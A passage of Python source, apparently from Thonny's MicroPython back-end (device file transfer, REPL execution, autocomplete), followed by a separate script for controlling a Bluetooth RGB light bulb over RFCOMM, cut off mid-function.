self._connection.write(RAW_MODE_CMD)
if output.endswith(FIRST_RAW_PROMPT[:-1]):
# incomplete raw prompt, wait for more
pass
elif output:
if capture_output:
if stream_name == "stdout":
out += output
else:
assert stream_name == "stderr"
err += output
else:
self._send_output(output.decode(ENCODING, errors="replace"), stream_name)
output = b""
debug("doneproc")
return (
out.decode(ENCODING, errors="replace"),
err.decode(ENCODING, errors="replace"),
None if value is None else value.decode(ENCODING),
)
def _clear_environment(self):
# TODO: Ctrl+D in raw repl is perfect for MicroPython
# but on CircuitPython it runs main.py
# TODO: which is better:
# self._execute_async(dedent("""
# for name in globals():
# if not name.startswith("__"):
# del globals()[name]
# """).strip())
# or
self._execute("globals().clear(); __name__ = '__main__'")
def _check_for_side_commands(self):
# most likely the queue is empty
if self._command_queue.empty():
return
postponed = []
while not self._command_queue.empty():
cmd = self._command_queue.get()
if isinstance(cmd, InputSubmission):
self._submit_input(cmd.data)
elif isinstance(cmd, EOFCommand):
self._soft_reboot(True)
else:
postponed.append(cmd)
# put back postponed commands
while postponed:
self._command_queue.put(postponed.pop(0))
def _forward_unexpected_output(self):
"Invoked between commands"
data = self._connection.read_all()
if data.endswith(NORMAL_PROMPT):
# looks like the device was resetted
# hide the regular prompt from the output ...
data = data[: -len(NORMAL_PROMPT)]
at_prompt = True
else:
at_prompt = False
self._send_output(data.decode(ENCODING, "replace"), "stdout")
if at_prompt:
# ... and recreate Thonny prompt
self.send_message(ToplevelResponse())
self._check_for_connection_errors()
def _supports_directories(self):
# NB! make sure self._cwd is queried first
return bool(self._cwd)
def _connected_to_microbit(self):
return "micro:bit" in self._welcome_text.lower()
def _cmd_interrupt(self, cmd):
self._interrupt()
def _cmd_cd(self, cmd):
if len(cmd.args) == 1:
if not self._supports_directories():
raise UserError("This device doesn't have directories")
path = cmd.args[0]
self._execute("import os as __thonny_os; __thonny_os.chdir(%r)" % path)
self._cwd = self._fetch_cwd()
return {}
else:
raise UserError("%cd takes one parameter")
def _cmd_Run(self, cmd):
self._clear_environment()
assert cmd.get("source")
self._execute(cmd["source"])
return {}
def _cmd_execute_source(self, cmd):
try:
# Try to parse as expression
ast.parse(cmd.source, mode="eval")
# If it didn't fail then source is an expression
_, _, value_repr = self._execute_print_expr(cmd.source)
if value_repr is None:
value_repr = repr(None)
return {"value_info": ValueInfo(0, value_repr)}
except SyntaxError:
# source is a statement (or invalid syntax)
self._execute(cmd.source)
return {}
def _cmd_execute_system_command(self, cmd):
# Can't use stdin, because a thread is draining it
execute_system_command(cmd, cwd=self._local_cwd, disconnect_stdin=True)
def _cmd_get_globals(self, cmd):
if cmd.module_name == "__main__":
globs = self._evaluate(
"{name : repr(value) for (name, value) in globals().items() if not name.startswith('__')}"
)
else:
globs = self._evaluate(
"{name : repr(getattr(__mod_for_globs, name)) in dir(__mod_for_globs) if not name.startswith('__')}",
prelude="import %s as __mod_for_globs",
)
return {"module_name": cmd.module_name, "globals": globs}
def _cmd_get_dirs_child_data(self, cmd):
if self._supports_directories():
data = self._get_dirs_child_data_generic(cmd["paths"])
dir_separator = "/"
else:
assert cmd["paths"] == {""}, "Bad command: " + repr(cmd)
sizes = self._get_microbit_file_sizes()
root_data = {name: {"kind": "file", "size": size} for (name, size) in sizes.items()}
data = {"": root_data}
dir_separator = ""
return {"node_id": cmd["node_id"], "dir_separator": dir_separator, "data": data}
def _cmd_get_fs_info(self, cmd):
return self._get_fs_info(cmd.path)
def _cmd_write_file(self, cmd):
def generate_blocks(content_bytes, block_size):
for i in range(0, len(content_bytes), block_size):
yield content_bytes[i : i + block_size]
self._write_file(generate_blocks(cmd["content_bytes"], BUFFER_SIZE), cmd["path"])
return InlineResponse(
command_name="write_file", path=cmd["path"], editor_id=cmd.get("editor_id")
)
def _cmd_delete(self, cmd):
assert cmd.paths
paths = sorted(cmd.paths, key=lambda x: len(x), reverse=True)
try:
self._delete_via_serial(paths)
except Exception as e:
if "read-only" in str(e).lower():
self._delete_via_mount(paths)
self._sync_all_filesystems()
def _internal_path_to_mounted_path(self, path):
mount_path = self._get_fs_mount()
if mount_path is None:
return None
flash_prefix = self._get_flash_prefix()
if not path.startswith(flash_prefix):
return None
path_suffix = path[len(flash_prefix) :]
return os.path.join(mount_path, os.path.normpath(path_suffix))
def _cmd_read_file(self, cmd):
try:
content_bytes = b"".join(self._read_file(cmd["path"]))
error = None
except Exception as e:
_report_internal_error()
error = str(e)
content_bytes = None
return {"content_bytes": content_bytes, "path": cmd["path"], "error": error}
def _cmd_download(self, cmd):
total_size = 0
completed_files_size = 0
remote_files = self._list_remote_files_with_info(cmd["source_paths"])
target_dir = cmd["target_dir"].rstrip("/").rstrip("\\")
download_items = []
for file in remote_files:
total_size += file["size"]
# compute filenames (and subdirs) in target_dir
# relative to the context of the user selected items
assert file["path"].startswith(file["original_context"])
path_suffix = file["path"][len(file["original_context"]) :].strip("/").strip("\\")
target_path = os.path.join(target_dir, os.path.normpath(path_suffix))
download_items.append(dict(source=file["path"], target=target_path, size=file["size"]))
if not cmd["allow_overwrite"]:
targets = [item["target"] for item in download_items]
existing_files = list(filter(os.path.exists, targets))
if existing_files:
return {
"existing_files": existing_files,
"source_paths": cmd["source_paths"],
"target_dir": cmd["target_dir"],
"description": cmd["description"],
}
def notify(current_file_progress):
self._check_send_inline_progress(
cmd, completed_files_size + current_file_progress, total_size
)
# replace the indeterminate progressbar with determinate as soon as possible
notify(0)
for item in download_items:
written_bytes = self._download_file(item["source"], item["target"], notify)
assert written_bytes == item["size"]
completed_files_size += item["size"]
def _cmd_upload(self, cmd):
completed_files_size = 0
local_files = self._list_local_files_with_info(cmd["source_paths"])
target_dir = cmd["target_dir"]
assert target_dir.startswith("/") or not self._supports_directories()
assert not target_dir.endswith("/") or target_dir == "/"
upload_items = []
for file in local_files:
# compute filenames (and subdirs) in target_dir
# relative to the context of the user selected items
assert file["path"].startswith(file["original_context"])
path_suffix = file["path"][len(file["original_context"]) :].strip("/").strip("\\")
target_path = self._join_remote_path_parts(target_dir, to_remote_path(path_suffix))
upload_items.append(dict(source=file["path"], target=target_path, size=file["size"]))
if not cmd["allow_overwrite"]:
targets = [item["target"] for item in upload_items]
existing_files = self._get_existing_remote_files(targets)
if existing_files:
return {
"existing_files": existing_files,
"source_paths": cmd["source_paths"],
"target_dir": cmd["target_dir"],
"description": cmd["description"],
}
total_size = sum([item["size"] for item in upload_items])
def notify(current_file_progress):
self._check_send_inline_progress(
cmd, completed_files_size + current_file_progress, total_size
)
# replace the indeterminate progressbar with determinate as soon as possible
notify(0)
for item in upload_items:
written_bytes = self._upload_file(item["source"], item["target"], notify)
assert written_bytes == item["size"]
completed_files_size += item["size"]
def _cmd_mkdir(self, cmd):
assert self._supports_directories()
assert cmd.path.startswith("/")
self._makedirs(cmd.path)
self._sync_all_filesystems()
def _cmd_editor_autocomplete(self, cmd):
# template for the response
result = dict(source=cmd.source, row=cmd.row, column=cmd.column)
try:
script = jedi.Script(cmd.source, cmd.row, cmd.column, sys_path=[self._api_stubs_path])
completions = script.completions()
result["completions"] = self._filter_completions(completions)
except Exception:
traceback.print_exc()
result["error"] = "Autocomplete error"
return result
def _filter_completions(self, completions):
# filter out completions not applicable to MicroPython
result = []
for completion in completions:
if completion.name.startswith("__"):
continue
if completion.parent() and completion.full_name:
parent_name = completion.parent().name
name = completion.name
root = completion.full_name.split(".")[0]
# jedi proposes names from CPython builtins
if root in self._builtins_info and name not in self._builtins_info[root]:
continue
if parent_name == "builtins" and name not in self._builtins_info:
continue
result.append({"name": completion.name, "complete": completion.complete})
return result
def _cmd_shell_autocomplete(self, cmd):
source = cmd.source
# TODO: combine dynamic results and jedi results
if source.strip().startswith("import ") or source.strip().startswith("from "):
# this needs the power of jedi
response = {"source": cmd.source}
try:
# at the moment I'm assuming source is the code before cursor, not whole input
lines = source.split("\n")
script = jedi.Script(
source, len(lines), len(lines[-1]), sys_path=[self._api_stubs_path]
)
completions = script.completions()
response["completions"] = self._filter_completions(completions)
except Exception:
traceback.print_exc()
response["error"] = "Autocomplete error"
return response
else:
# use live data
match = re.search(
r"(\w+\.)*(\w+)?$", source
) # https://github.com/takluyver/ubit_kernel/blob/master/ubit_kernel/kernel.py
if match:
prefix = match.group()
if "." in prefix:
obj, prefix = prefix.rsplit(".", 1)
names = self._evaluate(
"dir({}) if '{}' in locals() or '{}' in globals() else []".format(
obj, obj, obj
)
)
else:
names = self._evaluate("dir()")
else:
names = []
prefix = ""
completions = []
# prevent TypeError (iterating over None)
names = names if names else []
for name in names:
if name.startswith(prefix) and not name.startswith("__"):
completions.append({"name": name, "complete": name[len(prefix) :]})
return {"completions": completions, "source": source}
def _cmd_dump_api_info(self, cmd):
"For use during development of the plug-in"
self._execute(
dedent(
"""
def __get_object_atts(obj):
result = []
errors = []
for name in dir(obj):
try:
val = getattr(obj, name)
result.append((name, repr(val), repr(type(val))))
except BaseException as e:
errors.append("Couldn't get attr '%s' from object '%r', Err: %r" % (name, obj, e))
return (result, errors)
"""
)
)
for module_name in sorted(self._fetch_builtin_modules()):
if (
not module_name.startswith("_")
and not module_name.startswith("adafruit")
# and not module_name == "builtins"
):
file_name = os.path.join(
self._api_stubs_path, module_name.replace(".", "/") + ".py"
)
self._dump_module_stubs(module_name, file_name)
def _dump_module_stubs(self, module_name, file_name):
out, err, __ = self._execute("import {0}".format(module_name), capture_output=True)
if out or err:
print("FAILED IMPORTING MODULE:", module_name, "\nErr: " + out + err)
return
os.makedirs(os.path.dirname(file_name), exist_ok=True)
with io.open(file_name, "w", encoding="utf-8", newline="\n") as fp:
if module_name not in [
"webrepl",
"_webrepl",
"gc",
"http_client",
"http_client_ssl",
"http_server",
"framebuf",
"example_pub_button",
"flashbdev",
]:
self._dump_object_stubs(fp, module_name, "")
def _dump_object_stubs(self, fp, object_expr, indent):
if object_expr in [
"docs.conf",
"pulseio.PWMOut",
"adafruit_hid",
"upysh",
# "webrepl",
# "gc",
# "http_client",
# "http_server",
]:
print("SKIPPING problematic name:", object_expr)
return
print("DUMPING", indent, object_expr)
items, errors = self._evaluate("__get_object_atts({0})".format(object_expr))
if errors:
print("ERRORS", errors)
for name, rep, typ in sorted(items, key=lambda x: x[0]):
if name.startswith("__"):
continue
print("DUMPING", indent, object_expr, name)
self._send_text_to_shell(" * " + name + " : " + typ, "stdout")
if typ in ["<class 'function'>", "<class 'bound_method'>"]:
fp.write(indent + "def " + name + "():\n")
fp.write(indent + " pass\n\n")
elif typ in ["<class 'str'>", "<class 'int'>", "<class 'float'>"]:
fp.write(indent + name + " = " + rep + "\n")
elif typ == "<class 'type'>" and indent == "":
# full expansion only on toplevel
fp.write("\n")
fp.write(indent + "class " + name + ":\n") # What about superclass?
fp.write(indent + " ''\n")
self._dump_object_stubs(fp, "{0}.{1}".format(object_expr, name), indent + " ")
else:
# keep only the name
fp.write(indent + name + " = None\n")
def _read_file(self, path):
# TODO: read from mount when possible
# file_size = self._get_file_size(path)
block_size = 512
self._execute_without_output("__thonny_fp = open(%r, 'rb')" % path)
if "binascii" in self._builtin_modules:
self._execute_without_output("from binascii import hexlify as __temp_hexlify")
while True:
self._check_for_interrupt("local")
if "binascii" in self._builtin_modules:
block = binascii.unhexlify(
self._evaluate("__temp_hexlify(__thonny_fp.read(%s))" % block_size)
)
else:
block = self._evaluate("__thonny_fp.read(%s)" % block_size)
if block:
yield block
if len(block) < block_size:
break
self._execute_without_output(
dedent(
"""
__thonny_fp.close()
del __thonny_fp
try:
del __temp_hexlify
except:
pass
"""
)
)
def _write_file(self, content_blocks, target_path, notifier=None):
try:
result = self._write_file_via_serial(content_blocks, target_path, notifier)
except ReadOnlyFilesystemError:
result = self._write_file_via_mount(content_blocks, target_path, notifier)
self._sync_all_filesystems()
return result
def _write_file_via_mount(self, content_blocks, target_path, notifier=None):
mounted_target_path = self._internal_path_to_mounted_path(target_path)
with open(mounted_target_path, "wb") as f:
bytes_written = 0
for block in content_blocks:
self._check_for_interrupt("local")
bytes_written += f.write(block)
f.flush()
os.fsync(f)
if notifier is not None:
notifier(bytes_written)
return bytes_written
def _write_file_via_serial(self, content_blocks, target_path, notifier=None):
# prelude
try:
_, err, _ = self._execute(
dedent(
"""
__thonny_path = '{path}'
__thonny_written = 0
__thonny_fp = open(__thonny_path, 'wb')
"""
).format(path=target_path),
capture_output=True,
)
if "readonly" in err.replace("-", "").lower():
raise ReadOnlyFilesystemError()
elif err:
raise RuntimeError("Problem opening file for writing: " + err)
# Define function to allow shorter write commands
if "binascii" in self._builtin_modules:
self._execute_without_output(
dedent(
"""
from binascii import unhexlify as __thonny_unhex
def __W(x):
global __thonny_written
__thonny_written += __thonny_fp.write(__thonny_unhex(x))
__thonny_fp.flush()
"""
)
)
else:
self._execute_without_output(
dedent(
"""
def __W(x):
global __thonny_written
__thonny_written += __thonny_fp.write(x)
"""
)
)
bytes_sent = 0
for block in content_blocks:
self._check_for_interrupt("local")
if "binascii" in self._builtin_modules:
script = "__W(%r)" % binascii.hexlify(block)
else:
script = "__W(%r)" % block
self._execute_without_output(script)
bytes_sent += len(block)
if notifier is not None:
notifier(bytes_sent)
bytes_received = self._evaluate("__thonny_written")
if bytes_received != bytes_sent:
raise UserError(
"Expected %d written bytes but wrote %d" % (bytes_sent, bytes_received)
)
finally:
# clean up
self._execute(
dedent(
"""
try:
del __W
del __thonny_written
del __thonny_path
__thonny_fp.close()
del __thonny_fp
del __thonny_unhex
except:
pass
"""
)
)
return bytes_sent
def _sync_all_filesystems(self):
self._execute_without_output(
dedent(
"""
try:
from os import sync as __thonny_sync
__thonny_sync()
del __thonny_sync
except ImportError:
pass
"""
)
)
def _list_local_files_with_info(self, paths):
def rec_list_with_size(path):
result = {}
if os.path.isfile(path):
result[path] = os.path.getsize(path)
elif os.path.isdir(path):
for name in os.listdir(path):
result.update(rec_list_with_size(os.path.join(path, name)))
else:
raise RuntimeError("Can't process " + path)
return result
result = []
for requested_path in paths:
sizes = rec_list_with_size(requested_path)
for path in sizes:
result.append(
{
"path": path,
"size": sizes[path],
"original_context": os.path.dirname(requested_path),
}
)
result.sort(key=lambda rec: rec["path"])
return result
def _list_remote_files_with_info(self, paths):
# prepare universal functions
self._execute_without_output(
dedent(
"""
try:
import os as __thonny_os
from os import stat as __thonny_stat
def __thonny_getsize(path):
return __thonny_stat(path)[6]
def __thonny_isdir(path):
return __thonny_stat(path)[0] & 0o170000 == 0o040000
except ImportError:
__thonny_stat = None
# micro:bit
from os import size as __thonny_getsize
def __thonny_isdir(path):
return False
"""
)
)
self._execute_without_output(
dedent(
"""
def __thonny_rec_list_with_size(path):
result = {}
if __thonny_isdir(path):
for name in __thonny_os.listdir(path):
result.update(__thonny_rec_list_with_size(path + "/" + name))
else:
result[path] = __thonny_getsize(path)
return result
"""
)
)
result = []
for requested_path in paths:
sizes = self._evaluate("__thonny_rec_list_with_size(%r)" % requested_path)
for path in sizes:
result.append(
{
"path": path,
"size": sizes[path],
"original_context": os.path.dirname(requested_path),
}
)
result.sort(key=lambda rec: rec["path"])
self._execute_without_output(
dedent(
"""
del __thonny_os
del __thonny_stat
del __thonny_getsize
del __thonny_isdir
del __thonny_rec_list_with_size
"""
)
)
return result
def _get_existing_remote_files(self, paths):
if self._supports_directories():
func = "stat"
else:
func = "size"
return self._evaluate(
"__thonny_result",
prelude=dedent(
"""
import os as __thonny_os
__thonny_result = []
for __thonny_path in %r:
try:
__thonny_os.%s(__thonny_path)
__thonny_result.append(__thonny_path)
except OSError:
pass
"""
)
% (paths, func),
cleanup=dedent(
"""
del __thonny_os
del __thonny_result
del __thonny_path
"""
),
)
def _join_remote_path_parts(self, left, right):
if left == "": # micro:bit
assert not self._supports_directories()
return right.strip("/")
return left.rstrip("/") + "/" + right.strip("/")
def _get_file_size(self, path):
if self._supports_directories():
script = "__thonny_os.stat(%r)[6]"
else:
script = "os.stat(%r)[6]"
return self._evaluate(script % path, prelude="import os as __thonny_os")
def _makedirs(self, path):
if path == "/":
return
try:
self._makedirs_via_serial(path)
except Exception as e:
if "read-only" in str(e).lower():
self._makedirs_via_mount(path)
def _makedirs_via_mount(self, path):
mounted_path = self._internal_path_to_mounted_path(path)
assert mounted_path is not None, "Couldn't find mounted path for " + path
os.makedirs(mounted_path, exist_ok=True)
def _makedirs_via_serial(self, path):
if path == "/":
return
path = path.rstrip("/")
script = (
dedent(
"""
import os as __thonny_os
__thonny_parts = %r.split('/')
for i in range(2, len(__thonny_parts) + 1):
__thonny_path = "/".join(__thonny_parts[:i])
try:
__thonny_os.stat(__thonny_path)
except OSError:
# does not exist
__thonny_os.mkdir(__thonny_path)
del __thonny_parts
try:
del __thonny_path
except:
pass
"""
)
% path
)
self._execute_without_output(script)
def _delete_via_mount(self, paths):
for path in paths:
mounted_path = self._internal_path_to_mounted_path(path)
assert mounted_path is not None
shutil.rmtree(mounted_path)
def _delete_via_serial(self, paths):
if not self._supports_directories():
self._execute_without_output(
dedent(
"""
import os as __thonny_os
for __thonny_path in %r:
__thonny_os.remove(__thonny_path)
del __thonny_path
del __thonny_os
"""
)
% paths
)
else:
self._execute_without_output(
dedent(
"""
import os as __thonny_os
def __thonny_delete(path):
if __thonny_os.stat(path)[0] & 0o170000 == 0o040000:
for name in __thonny_os.listdir(path):
child_path = path + "/" + name
__thonny_delete(child_path)
__thonny_os.rmdir(path)
else:
__thonny_os.remove(path)
for __thonny_path in %r:
__thonny_delete(__thonny_path)
del __thonny_path
del __thonny_delete
del __thonny_os
"""
)
% paths
)
def _upload_file(self, source, target, notifier):
assert target.startswith("/") or not self._supports_directories()
target_dir, _ = linux_dirname_basename(target)
assert target_dir.startswith("/") or not self._supports_directories()
self._makedirs(target_dir)
def block_generator():
with open(source, "rb") as source_fp:
while True:
block = source_fp.read(512)
if block:
yield block
else:
break
return self._write_file(block_generator(), target, notifier=notifier)
def _download_file(self, source, target, notifier=None):
os.makedirs(os.path.dirname(target), exist_ok=True)
bytes_written = 0
with open(target, "wb") as out_fp:
for block in self._read_file(source):
out_fp.write(block)
os.fsync(out_fp)
bytes_written += len(block)
notifier(bytes_written)
return bytes_written
def _get_fs_mount_label(self):
# This method is most likely required with CircuitPython,
# so try its approach first
# https://learn.adafruit.com/welcome-to-circuitpython/the-circuitpy-drive
result = self._evaluate(
"__thonny_result",
prelude=dedent(
"""
try:
from storage import getmount as __thonny_getmount
try:
__thonny_result = __thonny_getmount("/").label
finally:
del __thonny_getmount
except ImportError:
__thonny_result = None
except OSError:
__thonny_result = None
"""
),
cleanup="del __thonny_result",
)
if result is not None:
return result
if self._welcome_text is None:
return None
"""
# following is not reliable and probably not needed
markers_by_name = {"PYBFLASH": {"pyb"}, "CIRCUITPY": {"circuitpython"}}
for name in markers_by_name:
for marker in markers_by_name[name]:
if marker.lower() in self._welcome_text.lower():
return name
"""
return None
def _get_flash_prefix(self):
if not self._supports_directories():
return ""
elif (
"LoBo" in self._welcome_text
or "WiPy with ESP32" in self._welcome_text
or "PYBLITE" in self._welcome_text
or "PYBv" in self._welcome_text
or "PYBOARD" in self._welcome_text.upper()
):
return "/flash/"
else:
return "/"
def _get_fs_mount(self):
label = self._get_fs_mount_label()
if label is None:
return None
else:
candidates = find_volumes_by_name(
self._get_fs_mount_label(),
# querying A can be very slow
skip_letters="A",
)
if len(candidates) == 0:
raise RuntimeError("Could not find volume " + self._get_fs_mount_label())
elif len(candidates) > 1:
raise RuntimeError("Found several possible mount points: %s" % candidates)
else:
return candidates[0]
def _get_fs_info(self, path):
result = self._evaluate(
dedent(
"""{
"total" : __thonny_total,
"used" : __thonny_used,
"free": __thonny_free,
"sizes": __thonny_sizes
}"""
),
prelude=dedent(
"""
try:
from os import statvfs as __thonny_statvfs
__thonny_stat = __thonny_statvfs(%r)
__thonny_total = __thonny_stat[2] * __thonny_stat[0]
__thonny_free = __thonny_stat[3] * __thonny_stat[0]
__thonny_used = __thonny_total - __thonny_free
__thonny_sizes = None
del __thonny_statvfs
del __thonny_stat
except ImportError:
import os as __thonny_os
__thonny_sizes = [__thonny_os.size(name) for name in __thonny_os.listdir()]
__thonny_used = None
__thonny_total = None
__thonny_free = None
del __thonny_os
"""
)
% path,
cleanup=dedent(
"""
del __thonny_total
del __thonny_free
del __thonny_used
del __thonny_sizes
"""
),
)
if result["sizes"] is not None:
if self._connected_to_microbit():
comment = "Assuming around 30 kB of storage space for user files."
else:
comment = "Don't know the size of storage space on this device."
files_total_size = sum(result["sizes"])
# TODO: compute number of used blocks
if files_total_size > 0:
comment += "\n\n" + "At least %s of it is used by %d file(s)." % (
sizeof_fmt(files_total_size),
len(result["sizes"]),
)
result["comment"] = comment
del result["sizes"]
return result
def _get_microbit_file_sizes(self):
return self._evaluate(
"{name : __thonny_os.size(name) for name in __thonny_os.listdir()}",
prelude="import os as __thonny_os",
cleanup="del __thonny_os",
)
def _get_dirs_child_data_generic(self, paths):
return self._evaluate(
"__thonny_result",
prelude=dedent(
"""
import os as __thonny_os
# Init all vars, so that they can be deleted
# even if the loop makes no iterations
__thonny_result = {}
__thonny_path = None
__thonny_st = None
__thonny_child_names = None
__thonny_children = None
__thonny_name = None
__thonny_real_path = None
__thonny_full = None
for __thonny_path in %(paths)r:
__thonny_real_path = __thonny_path or '/'
try:
__thonny_child_names = __thonny_os.listdir(__thonny_real_path)
except OSError:
# probably deleted directory
__thonny_children = None
else:
__thonny_children = {}
for __thonny_name in __thonny_child_names:
if __thonny_name.startswith('.') or __thonny_name == "System Volume Information":
continue
__thonny_full = (__thonny_real_path + '/' + __thonny_name).replace("//", "/")
try:
__thonny_st = __thonny_os.stat(__thonny_full)
if __thonny_st[0] & 0o170000 == 0o040000:
# directory
__thonny_children[__thonny_name] = {"kind" : "dir", "size" : None}
else:
__thonny_children[__thonny_name] = {"kind" : "file", "size" :__thonny_st[6]}
# converting from 2000-01-01 epoch to Unix epoch
__thonny_children[__thonny_name]["time"] = max(__thonny_st[8], __thonny_st[9]) + 946684800
except OverflowError:
# Probably "System Volume Information" in trinket
# https://github.com/thonny/thonny/issues/923
pass
__thonny_result[__thonny_path] = __thonny_children
"""
)
% {"paths": paths},
cleanup=dedent(
"""
del __thonny_os
del __thonny_st
del __thonny_children
del __thonny_name
del __thonny_path
del __thonny_full
del __thonny_result
del __thonny_real_path
"""
),
)
def _check_for_connection_errors(self):
self._connection._check_for_error()
def _on_connection_closed(self, error=None):
message = "Connection lost"
if error:
message += " (" + str(error) + ")"
self._send_output("\n" + message + "\n", "stderr")
self._send_output("\n" + "Use Stop/Restart to reconnect." + "\n", "stderr")
sys.exit(EXPECTED_TERMINATION_CODE)
def _show_error(self, msg):
self._send_output(msg + "\n", "stderr")
class ExecutionError(Exception):
pass
def _report_internal_error():
print("PROBLEM WITH THONNY'S BACK-END:\n", file=sys.stderr)
traceback.print_exc()
def parse_api_information(file_path):
with tokenize.open(file_path) as fp:
source = fp.read()
tree = ast.parse(source)
defs = {}
# TODO: read also docstrings ?
for toplevel_item in tree.body:
if isinstance(toplevel_item, ast.ClassDef):
class_name = toplevel_item.name
member_names = []
for item in toplevel_item.body:
if isinstance(item, ast.FunctionDef):
member_names.append(item.name)
elif isinstance(item, ast.Assign):
# TODO: check Python 3.4
"TODO: item.targets[0].id"
defs[class_name] = member_names
return defs
def linux_dirname_basename(path):
if path == "/":
return ("/", "")
if "/" not in path: # micro:bit
return "", path
path = path.rstrip("/")
dir_, file_ = path.rsplit("/", maxsplit=1)
if dir_ == "":
dir_ = "/"
return dir_, file_
def to_remote_path(path):
return path.replace("\\", "/")
class ReadOnlyFilesystemError(RuntimeError):
pass
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("--clean", type=lambda s: True if s == "True" else False)
parser.add_argument("--port", type=str)
parser.add_argument("--url", type=str)
parser.add_argument("--password", type=str)
parser.add_argument("--api_stubs_path", type=str)
parser.add_argument("--min_write_delay", type=float, default=0.01)
args = parser.parse_args()
port = None if args.port == "None" else args.port
try:
if port is None:
# remain busy
while True:
time.sleep(1000)
elif port == "webrepl":
from thonny.plugins.micropython.webrepl_connection import WebReplConnection
connection = WebReplConnection(args.url, args.password, args.min_write_delay)
else:
from thonny.plugins.micropython.serial_connection import SerialConnection
connection = SerialConnection(port, BAUDRATE)
vm = MicroPythonBackend(connection, clean=args.clean, api_stubs_path=args.api_stubs_path)
except ConnectionFailedException as e:
text = "\n" + str(e) + "\n"
msg = BackendEvent(event_type="ProgramOutput", stream_name="stderr", data=text)
sys.stdout.write(serialize_message(msg) + "\n")
sys.stdout.flush()
|
bulb.py
|
import bluetooth, math, time, threading, logging
class BluetoothBulb:
def __init__(self, mac_address, name):
self.__mac_address = mac_address
self.__name = name
self.__sock = None
self.__socket_lock = threading.Lock()
self.__heartbeat_running = False
self.__heartbeat_thread = None
self.__is_power = None
self.__is_color = None
self.__current_brightness = None
self.__current_color = None
def is_connected(self):
return (self.__sock is not None)
def get_name(self):
return self.__name
def get_mac_address(self):
return self.__mac_address
def is_powered_on(self):
return self.__is_power
def is_color_mode(self):
return self.__is_color
# returns current lamp brightness. range is [1, 16]
def get_brightness(self):
return self.__current_brightness
# returns tuple (r, g, b) with current lamp color
def get_color_rgb(self):
return self.__current_color
# see https://en.wikipedia.org/wiki/HSL_and_HSV
def __rgb_to_hsv(self, r, g, b):
(r_, g_, b_) = (r/255, g/255, b/255)
c_max = max(r_, g_, b_)
c_min = min(r_, g_, b_)
delta_c = c_max - c_min
hue = 0
if delta_c != 0 and c_max == r_:
hue = 60 * (((g_-b_)/delta_c) % 6)
elif delta_c != 0 and c_max == g_:
hue = 60 * (((b_-r_)/delta_c) + 2)
elif delta_c != 0 and c_max == b_:
hue = 60 * (((r_-g_)/delta_c) + 4)
sat = 0
if c_max != 0:
sat = delta_c / c_max
val = c_max
return (hue, sat, val)
# returns tuple (hue, sat, val) with current lamp color
def get_color_hsv(self):
(r, g, b) = self.get_color_rgb()
return self.__rgb_to_hsv(r, g, b)
# calculates __current_brightness from (r, g, b) color
# and sets __current_color to (r, g, b) at maximum intensity
def __set_normalized_color_brightness(self, r, g, b):
brightness = max(r, g, b, 1)
if brightness == 255:
self.__current_brightness = 16
self.__current_color = (r, g, b)
else:
self.__current_brightness = math.ceil(brightness / 16)
self.__current_color = \
(math.ceil(round(r * 255 / brightness, 0)), \
math.ceil(round(g * 255 / brightness, 0)), \
math.ceil(round(b * 255 / brightness, 0)))
def __send_hex_string(self, bulb_function, data):
with self.__socket_lock:
try:
logging.debug('Sending function %02x - data %s' % (bulb_function, data))
hex_string = '01fe000051%02x' % bulb_function # 01fe0000 + 51 (write) + function code
length = int(len(data) / 2) + 7
hex_string = '%s%02x%s' % (hex_string, length, data)
self.__sock.send(bluetooth.binascii.unhexlify(hex_string))
logging.debug('Receiving answer')
header = self.__sock.recv(6) # 01fe0000 + 41 (read) + function code
logging.debug(' header = %s' % bluetooth.binascii.hexlify(header))
length = self.__sock.recv(1) # length
logging.debug(' length = %d' % length[0])
data = self.__sock.recv(length[0] - 7) # data
logging.debug(' data = %s' % bluetooth.binascii.hexlify(data))
except:
self.__sock.close()
self.__sock = None
return data
# Connects to the bulb at the given MAC address. Note that the bluetooth controller should be
# powered on and no other device should have a connection to the bulb.
def connect(self):
# search for SPP service
service_matches = bluetooth.find_service(uuid='00001101-0000-1000-8000-00805F9B34FB', \
address=self.__mac_address)
if len(service_matches) > 0:
#if len(service_matches) > 1:
# logging.warning("More than 1 service found, continuing with the first service.")
first_match = service_matches[0]
name = first_match['name']
host = first_match['host']
port = first_match['port']
# Create the client socket
logging.info('Connecting to \'%s\' on %s port %s' % (name, host, port))
try:
self.__sock = bluetooth.BluetoothSocket(bluetooth.RFCOMM)
self.__sock.connect((host, port))
self.__setup_connection()
except:
logging.error('Connection to %s failed' % self.__mac_address)
self.__sock = None
else:
logging.error('Couldn\'t find the SPP service.')
# Disconnects from the bulb.
def disconnect(self):
if self.__sock:
logging.info('Disconnecting')
self.__stop_heartbeat_thread()
self.__sock.close()
self.__sock = None
self.__is_power = None
self.__is_color = None
self.__current_brightness = None
self.__current_color = None
def __check_connection(func):
def wrapper(self, *args, **kargs):
if not self.__sock:
raise Exception('Need to connect first!')
return func(self, *args, **kargs)
return wrapper
@__check_connection
def __setup_connection(self):
logging.debug('Setup connection')
# ASCII 01234567
self.__sock.send(bluetooth.binascii.unhexlify('3031323334353637'))
self.__start_heartbeat_thread()
# read current color
self.__read_current_status()
# we don't know the pwer state, turn it on to be sure
self.set_power(True)
# bulb function 0x00, TODO information is returned but its meaning is unclear
@__check_connection
def read_information_0x00(self):
return self.__send_hex_string(0x00, '000000008000000080')
# bulb function 0x02, heartbeat TODO information is returned but its meaning is unclear
# The official app sends this about once a second, but it turns out to be not strictly necessary
#@__check_connection
def __heartbeat(self):
self.__heartbeat_running = True
while self.__heartbeat_running:
logging.debug('Heartbeat')
self.__send_hex_string(0x02, '000000008000000080')
time.sleep(1)
logging.debug('Heartbeat stopped')
def __start_heartbeat_thread(self):
logging.debug('Starting heartbeat')
if not self.__heartbeat_running:
self.__heartbeat_thread = threading.Thread(target=self.__heartbeat, args=())
self.__heartbeat_thread.start()
def __stop_heartbeat_thread(self):
logging.debug('Stopping heartbeat')
if self.__heartbeat_thread and self.__heartbeat_running:
self.__heartbeat_running = False
self.__heartbeat_thread.join()
# bulb function 0x80, read bulb identification
# At least the name of the device is returned and probably a version number as well, but the
# meaning of the other information is unclear
@__check_connection
def read_identification(self):
logging.debug('Read lamp information')
return self.__send_hex_string(0x80, '000000000000000000')
# bulb function 0x81, subfunction 0x00: read power and color status
@__check_connection
def __read_current_status(self):
data = self.__send_hex_string(0x81, '0000000000000000000d07010300000e')
logging.debug('Read color mode status: %s' % bluetooth.binascii.hexlify(data))
if data[14] == 0x01:
